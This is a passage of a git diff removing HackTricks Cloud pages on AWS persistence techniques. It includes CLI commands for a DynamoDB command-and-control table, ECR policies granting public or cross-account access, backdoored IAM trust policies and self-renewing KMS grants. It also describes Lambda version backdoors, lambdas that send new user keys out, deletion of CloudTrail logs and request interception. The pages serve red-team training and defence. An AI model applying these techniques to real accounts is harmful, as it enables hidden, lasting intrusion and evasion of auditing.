- -```bash -# Create a DynamoDB table for C2 -aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region - -# Insert a command into the table -aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region -``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md deleted file mode 100644 index e2f500bf0..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - EC2 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EC2 - -For more information check: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Security Group Connection Tracking Persistence - -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. - -If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** - -### EC2 Lifecycle Manager - -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. - -### Scheduled Instances - -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. - -### Spot Fleet Request - -Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. 
- -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -* Backdooring the **User Data** - -### **Backdoor Launch Configuration** - -* Backdoor the used AMI -* Backdoor the User Data -* Backdoor the Key Pair - -### VPN - -Create a VPN so the attacker will be able to connect directly through i to the VPC. - -### VPC Peering - -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md deleted file mode 100644 index cdea71f8d..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ /dev/null @@ -1,124 +0,0 @@ -# AWS - ECR Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Hidden Docker Image with Malicious Code - -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. - -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: - -```bash -aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json - -# With a .json such as - -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -{% hint style="warning" %} -Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. -{% endhint %} - -### Registry Policy & Cross-account Replication - -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. - -
- -First, you need to give the external account access over the registry with a **registry policy** like: - -```bash -aws ecr put-registry-policy --policy-text file://my-policy.json - -# With a .json like: - -{ - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" -} -``` - -Then apply the replication config: - -```bash -aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 - -# Having the .json a content such as: -{ - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md deleted file mode 100644 index b534c2fd2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - EFS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### Modify Resource Policy / Security Groups - -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. - -### Create Access Point - -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md deleted file mode 100644 index accebf399..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ /dev/null @@ -1,78 +0,0 @@ -# AWS - IAM Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### Common IAM Persistence - -* Create a user -* Add a controlled user to a privileged group -* Create access keys (of the new user or of all users) -* Grant extra permissions to controlled users/groups (attached policies or inline policies) -* Disable MFA / Add you own MFA device -* Create a Role Chain Juggling situation (more on this below in STS persistence) - -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": [ - "*", - "arn:aws:iam::123213123123:root" - ] - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -### Backdoor Policy Version - -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. - -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md deleted file mode 100644 index dbf4efa29..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - KMS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For mor information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Grant acces via KMS policies - -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. - -### Eternal Grant - -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. - -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) - -```bash -# To generate grants, generate 10 like this one -aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" - -# To monitor grants -aws kms list-grants --key-id -``` - -{% hint style="info" %} -A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md deleted file mode 100644 index 13f2777a8..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ /dev/null @@ -1,90 +0,0 @@ -# AWS - Lambda Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Lambda Layer Persistence - -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: - -{% content-ref url="aws-lambda-layers-persistence.md" %} -[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md) -{% endcontent-ref %} - -### Lambda Extension Persistence - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -### Via resource policies - -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: - -
- -### Versions, Aliases & Weights - -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. - -
- -### Version Backdoor + API Gateway - -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked - -### Cron/Event actuator - -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. - -* Every time a new user is created lambda generates a new user key and send it to the attacker. -* Every time a new role is created lambda gives assume role permissions to compromised users. -* Every time new cloudtrail logs are generated, delete/alter them - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md deleted file mode 100644 index aa8a0269f..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ /dev/null @@ -1,69 +0,0 @@ -# AWS - Abusing Lambda Extensions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Extensions - -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. - -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. - -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). - -### External Extension for Persistence, Stealing Requests & modifying Requests - -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. 
**This means that an external extension has full read and write access to Rapid’s heap memory, by design.** - -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. - -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

- -The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. - -{% hint style="warning" %} -By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. -{% endhint %} - -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

- -The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. - -## References - -* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) -* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md deleted file mode 100644 index 77290eacb..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Lightsail Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Download Instance SSH keys & DB passwords - -They won't be changed probably so just having them is a good option for persistence - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** -* Expose a port with port knocking with a backdoor - -### DNS persistence - -If domains are configured: - -* Create a subdomain pointing your IP so you will have a **subdomain takeover** -* Create **SPF** record allowing you to send **emails** from the domain -* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md deleted file mode 100644 index 641621662..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - RDS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
